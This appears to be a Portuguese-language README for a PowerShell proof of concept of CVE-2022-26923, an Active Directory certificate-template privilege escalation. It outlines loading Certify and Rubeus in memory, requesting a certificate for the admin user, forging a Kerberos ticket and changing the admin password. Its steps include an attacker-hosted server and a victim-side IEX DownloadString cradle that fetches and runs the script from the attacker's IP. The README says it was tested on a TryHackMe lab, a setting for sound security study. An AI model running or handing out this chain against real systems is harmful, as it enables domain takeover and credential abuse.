CVE-2022-26923-Powershell-POC
Um POC em PowerShell para carregar e executar automaticamente o Certify e o Rubeus a partir da memória.
Como funciona?
- Carrega o Certify.exe e o Rubeus.exe na memória.
- Verifica a máquina alvo em busca de modelos de certificado mal configurados. (mais em https://www.youtube.com/watch?v=HBRCI5O35R8)
- Solicita um certificado para o usuário administrativo, com base no modelo vulnerável.
- Envia o certificado para o handler de certificados, que o converte para o formato .pfx e o envia de volta ao cliente.
- Utiliza o Rubeus para carregar o certificado e gerar um ticket para o usuário administrativo.
- Altera a senha do usuário administrativo. (Apenas para a demonstração)
O POC é testado nos seguintes laboratórios TryHackMe: https://tryhackme.com/room/adcertificatetemplates
Este CVE é usado para escalonamento de privilégios, portanto nenhuma exploração inicial é coberta nesta demonstração, nem no laboratório do THM.
Passos:
- python3 -m http.server 80 [Máquina do Atacante]
- python3 uploader.py 8000 [Máquina do Atacante]
- IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [Máquina da Vítima]
Nota: Este POC é apenas para fins educacionais; você é responsável pelas suas próprias ações.